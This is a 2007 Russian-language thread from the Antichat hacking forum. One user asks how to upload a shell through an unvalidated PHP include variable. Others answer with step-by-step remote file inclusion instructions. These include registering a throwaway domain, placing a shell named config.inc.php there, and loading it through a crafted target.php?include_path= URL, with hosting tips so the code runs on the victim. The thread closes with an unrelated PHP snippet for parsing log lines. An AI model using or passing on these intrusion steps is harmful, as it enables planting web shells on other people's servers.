 |
|

12.11.2007, 18:43
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
например так:
include $_GET[path]."date.php";
|
|
|

12.11.2007, 18:58
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
С нами:
9845611
Репутация:
17
|
|
понятна,не я так не делаю.
|
|
|

12.11.2007, 23:42
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
С нами:
9734104
Репутация:
0
|
|
Привет, в php скрипте, есть сл. код:
PHP код:
require_once $include_path."/include/config.inc.php";
Переменная "$include_path", никак не проверяется, т.е. я могу выполнить следующее:
target.php?include_path=http://somehost.ru
при условии, что на somehost.ru, есть "/include/config.inc.php".
Насколько я понял, подобная уязвимость описывается тут, но мне не совсем понятно, что нужно делать =/
Вопрос: что с этим делать дальше?
Как можно залить шел?
|
|
|

12.11.2007, 23:49
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от InvisHero
Привет, в php скрипте, есть сл. код:
PHP код:
require_once $include_path."/include/config.inc.php";
Переменная "$include_path", никак не проверяется, т.е. я могу выполнить следующее:
target.php?include_path=http://somehost.ru
при условии, что на somehost.ru, есть "/include/config.inc.php".
Насколько я понял, подобная уязвимость описывается тут, но мне не совсем понятно, что нужно делать =/
Вопрос: что с этим делать дальше?
Как можно залить шел?
Для начала тебе надо было задавать вопрос тут http://forum.antichat.ru/thread46016.html
Да ты прав бага есть и юзать ты можешь так как ты и сказал но есть одно НО! В php.ini должны быть включены register_globals без этого ты не сможешь заюзать эту багу... Ну а как шелл залить надеюсь догадаешься...
__________________
Кто я?..
|
|
|

13.11.2007, 00:07
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Насчет register_globals I-I()/Ib по идее правильно сказал, но есть куча функций, которые глобализируют переменную, это неплохо описал гемаглобин, а при хорошем раскладе (т.е. ты можешь в реквест пользовать эту переменную) ты можешь сделать следующее
зарегить на народе доменчик какой нить, ну например shell-dla-includa.narod.ru
создать там папку /include/ и в эту папку записать шелл и назвать его config.inc.php
далее через эту багу его подключить....target.php?include_path=ht tp://shell-dla-includa.narod.ru
__________________
Карфаген должен быть разрушен...
|
|
|

13.11.2007, 00:12
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
С нами:
9734104
Репутация:
0
|
|
Сообщение от Scipio
Насчет register_globals I-I()/Ib по идее правильно сказал, но есть куча функций, которые глобализируют переменную, это неплохо описал гемаглобин, а при хорошем раскладе (т.е. ты можешь в реквест пользовать эту переменную) ты можешь сделать следующее
зарегить на народе доменчик какой нить, ну например shell-dla-includa.narod.ru
создать там папку /include/ и в эту папку записать шелл и назвать его config.inc.php
далее через эту багу его подключить....target.php?include_path=ht tp://shell-dla-includa.narod.ru
я именно так и делаю, но "config.inc.php", выполняется на удалённом сервере, а не на первичном.
|
|
|

13.11.2007, 00:17
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от InvisHero
я именно так и делаю, но "config.inc.php", выполняется на удалённом сервере, а не на первичном.
Господи ну ты еврей залей инклужимый скрипт туда где php не поддерживается!!!
Люди впишите в свои факи по инклудингу это крупным шрифтом на пол экрана... Бо я как смотрю это уже не первый впрос по этому поводу...
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 13.11.2007 в 00:20..
|
|
|

13.11.2007, 00:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
ет народ.. позно уже голова не варит....
Помогите собрать регулярное выражение
192.168.101.215 - - [12/Nov/2007:18:28:32 +0300] "GET / HTTP/1.1" 200 4570
Регулярка на айпи, дату, запрос
П.С. Мне просто надо чтоб он(скрипт) выводил всьо ето красиво и табличках(логи)
__________________
BlackHat. MoDL
|
|
|

13.11.2007, 01:33
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 3
С нами:
9734104
Репутация:
0
|
|
Всем спасибо)
|
|
|

13.11.2007, 16:32
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами:
10892546
Репутация:
2274
|
|
Dimi4, ну мну делалбы без регулярок... Токо это мну! А ты как хош 
Просто explode по пробелам...
PHP код:
<?
$s = '192.168.101.215 - - [12/Nov/2007:18:28:32 +0300] "GET / HTTP/1.1" 200 4570';
$s = explode(' ',$s);
echo "IP: {$s[0]}<br>
Date: {$s[3]} {$s[4]}<br>
Query: {$s[5]} {$s[6]} {$s[7]}";
?>
Хотя да... Криво получается... Но т.к. я регулярки незнаю, удачи 
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|